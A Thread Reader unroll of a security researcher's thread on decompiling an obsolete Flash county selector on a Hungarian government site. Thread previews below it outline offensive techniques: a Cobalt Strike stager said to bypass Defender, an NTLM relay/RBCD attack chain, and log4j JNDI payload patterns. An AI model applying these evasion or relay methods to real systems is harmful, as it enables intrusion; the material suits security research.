Share this page!

Enter URL or ID to Unroll

You can paste full URL like: https://x.com/threadreaderapp/status/1644127596119195649
or just the ID like: 1644127596119195649

How to get URL link on X (Twitter) App

  1. On the Twitter thread, click on or icon on the bottom
  2. Click again on or Share Via icon
  3. Click on Copy Link to Tweet
  4. Paste it above and click "Unroll Thread"!
  5. More info at Twitter Help
an0n Profile picture
@an0n_r0
Aug 17, 2022 7 tweets 5 min read Read on X
Scrolly
If you want to browse the customer service locations of the Hungarian State Treasury on allamkincstar.gov.hu, it is good to have some basic #ReverseEngineering skills. 😉 #UXFail @AdobeFlash in 2022. Thread 1/🧵⬇️ Image
It is relatively easy to navigate to a customer service selector page. At the bottom there should be a county chooser according to the text, but there is nothing below. Let’s see why. 2/🧵⬇️ Image
In the source code we can see that the webpage contains a Flash (SWF) object included. Yes, the county chooser of allamkincstar.gov.hu is a flash object, even though it is 2022 and @AdobeFlash is EOL and support has been removed from the browsers for over >1.5 year. 3/🧵⬇️ Image
Ok, let’s download the SWF file and let’s try to open it with the open source Ruffle.rs Flash Player Emulator (outside the browser). Now we have the county chooser on a map, but unfortunately we still do not know how does it interact with the webpage. 4/🧵⬇️ Image
Let’s add some debugging through Rust logging variables for Ruffle. Now by pushing the various counties on the map, there are trace messages showing different error values for the different counties. For example, we get 13 for the capital Budapest+Pest county. 5/🧵⬇️ Image
Now let’s extract the ActionScript from the SWF file using the Flare tool (nowrap.de/flare.html). The decompiled ActionScript shows that the various button release events call the same JavaScript function with different integer parameters. 6/🧵⬇️ Image
Back to the selector page in the browser. Let’s call the extracted JS function in the console with param 13 (sniffed from tracing the SWF). Success: it opens the page where the required customer service locations are listed.

This is how we browse the web here in 2022. 7/🧵🙃🇭🇺 ImageImage

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with an0n

an0n Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @an0n_r0

an0n Profile picture
Jun 11, 2023
Built a special JS stager for Cobalt Strike (or for anything else).

Actually it is based on C# .NET, and it is super simple (full source is on the screenshot) because it uses the PE mapper from DInvoke.

Currently managed to bypass Defender.

Sharing some details in this thread. Image
First, I started from a stageless Cobalt Strike beacon payload generated using my custom Artifact Kit, already including some advanced evasion features what I didn't want to rewrite again.

That's why I turned to PE staging instead of the common shellcode loading technique.
Luckily, DInvoke (besides other super features) supports manual PE mapping of unmanaged code from managed .NET projects out-of-the-box.

thewover.github.io/Dynamic-Invoke/

The only difficulty in using DInvoke is that it is flagged by most AV products.
Read 9 tweets
an0n Profile picture
Jan 22, 2023
If NetNTLMv1 is disabled but LDAP signing is not enforced on DC, and there is WebClient service enabled on the target, pwn is similar (~RBCD abuse). NTLM relay should be HTTP->LDAP instead of SMB->LDAP (WebClient does not set signature requirement on the client side).
WebDAV target for coerced NTLM auth should be a dotless hostname (conforming Trusted/Intranet zone). No worries, arbitrary hostname can be registered even using a low-privileged domain account in ADIDNS (using the dnstool script in krbrelayx).
And what if WebClient is not running (but installed) on the target? Startup is triggered when anyone opens a folder with a searchConnector-ms file containing an HTTP URL iconReference.🙂
Read 4 tweets
an0n Profile picture
Aug 19, 2022
RDP logon with certificate: @_EthicalChaos_ is releasing a dedicated tool for this soon!

Until that, here is how I did this before (from Linux): simulating PIV applet on an emulated smartcard device locally and pass it through RDP. 🧵/1 👇
First component needed: vpcd frankmorgner.github.io/vsmartcard/vir…, a virtual smart card device, what is actually emulating a software smart card reader in the PC/SC Smart Card Daemon. Just add vpcd into pcscd. 🧵/2 👇
Next step is inserting a proper smart card into the virtual smart card reader device. Simulating PIV with PivApplet: github.com/OpenSC/OpenSC/…, a Personal Identity Verification compatible JavaCard applet using jCardSim jcardsim.org 🧵/3 👇
Read 5 tweets
an0n Profile picture
Dec 10, 2021
#log4j storm is coming, cryptominers in the first wave.

checked multiple (non-java ;) ) webservers i run and the logs are getting filled with the ${jndi:ldap://...} payloads.

THREAD: let's see a weaponized one.
one common scheme is: ldap://host:port/Basic/Command/Base64/[base64encodedstring].

some of the LDAP urls are still accessible (usually only from targeted IPs, other IPs are firewalled). getting the LDAP data returns the JNDI object.
Unfortunately this javaCodeBase URL became offline at the moment, but the Base64 encoded part is simple bash, so the "foo" class should be a basic OS command launcher.
Read 8 tweets

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us!

Send Email!

:(